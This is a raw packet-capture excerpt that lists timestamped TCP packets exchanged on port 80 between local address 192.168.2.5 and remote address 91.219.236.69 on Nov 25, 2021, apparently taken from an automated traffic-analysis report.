                                                                                                                                                  Nov 25, 2021 18:24:14.517847061 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.517891884 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.553797007 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.553826094 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.553844929 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.553864002 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.553961039 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.555788040 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555835009 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555854082 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555871010 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555888891 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555906057 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555919886 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555932999 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555949926 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555965900 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.555979967 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.555984020 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.556001902 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.556021929 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.556031942 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.556049109 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.556054115 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.556075096 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.556085110 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.556104898 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.556124926 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.556181908 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.556190014 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.557674885 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557698011 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557714939 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557727098 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557740927 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557744026 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.557754040 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557775021 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557779074 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.557794094 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557811022 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557826996 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557835102 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.557841063 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.557863951 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.557892084 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.558470964 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558494091 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558510065 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558526993 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558595896 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.558600903 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558614016 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.558626890 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558645964 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558687925 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.558727026 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558748007 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558763027 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558775902 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.558796883 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.558832884 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.615803957 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615849972 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615869045 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615885019 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615904093 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615915060 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.615926027 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615941048 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.615947008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615967035 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615984917 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.615993023 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616003036 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616020918 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616029024 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616040945 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616060019 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616075039 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616082907 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616085052 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616111040 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616137981 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616147041 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616159916 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616179943 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616180897 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616199970 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616219044 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616226912 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616236925 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616255045 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616275072 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616285086 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616303921 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616307974 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616329908 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616344929 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616350889 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616368055 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616380930 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616390944 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616406918 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616421938 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616432905 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616457939 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616475105 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616497993 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616511106 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616520882 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616528988 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616549015 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616568089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616585016 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616600037 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616601944 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616616011 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616633892 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616633892 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616652966 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616656065 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616672039 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616677046 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616691113 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616709948 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616720915 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616730928 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616739988 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.616770983 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.616797924 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657176971 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657200098 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657217979 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657233953 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657258034 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657274961 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657288074 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657306910 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657324076 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657330036 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657349110 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657366037 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657385111 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657402992 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657417059 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657418966 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657428980 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657432079 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657443047 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657459021 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657475948 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657484055 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657494068 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657505035 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657510996 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657531023 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657538891 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657547951 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657565117 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657568932 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657582045 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657602072 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657619953 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657618999 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657639027 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657653093 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657656908 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657675028 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657682896 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657692909 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657712936 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657731056 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657737970 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657748938 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657766104 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657767057 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657788992 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657793045 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657812119 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657826900 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657831907 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657850981 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657867908 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657881975 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657886028 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657903910 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657918930 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.657926083 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.657969952 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698348999 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698385000 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698410988 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698436022 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698460102 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698482990 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698501110 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698514938 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698525906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698550940 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698576927 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698601007 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698602915 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698626995 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698647022 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698653936 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698683023 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698705912 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698710918 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698736906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698753119 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698760033 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698786974 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698812008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698832989 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698836088 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698859930 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698880911 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698883057 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698906898 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698930025 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698952913 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698975086 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698996067 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.698997974 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.698999882 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699008942 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699023962 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699043036 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699047089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699073076 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699095964 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699099064 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699122906 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699146032 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699163914 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699171066 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699199915 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699206114 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699229956 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699253082 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699260950 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699279070 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699302912 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699302912 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699332952 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699354887 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.699357033 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.699404001 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.739886999 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.739924908 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.739955902 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.739988089 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740021944 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740037918 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740051985 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740077019 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740091085 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740109921 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740135908 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740144014 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740159988 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740185022 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740231991 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740289927 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740291119 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740326881 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740330935 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740350008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740381002 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740411997 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740431070 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740443945 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740474939 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740495920 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740505934 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740536928 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740560055 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740561008 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740577936 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740592957 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740626097 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740658998 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740670919 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740689039 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740701914 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740730047 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740777016 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740823030 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740844011 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740921974 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740957975 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740978956 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.740988970 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.740998983 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.741020918 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.741058111 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.741063118 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.741106987 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.741153955 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.741156101 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.741189003 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.741219997 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.741234064 CET4976780192.168.2.591.219.236.69
                                                                                                                                                  Nov 25, 2021 18:24:14.741251945 CET804976791.219.236.69192.168.2.5
                                                                                                                                                  Nov 25, 2021 18:24:14.741283894 CET804976791.219.236.69192.168.2.5
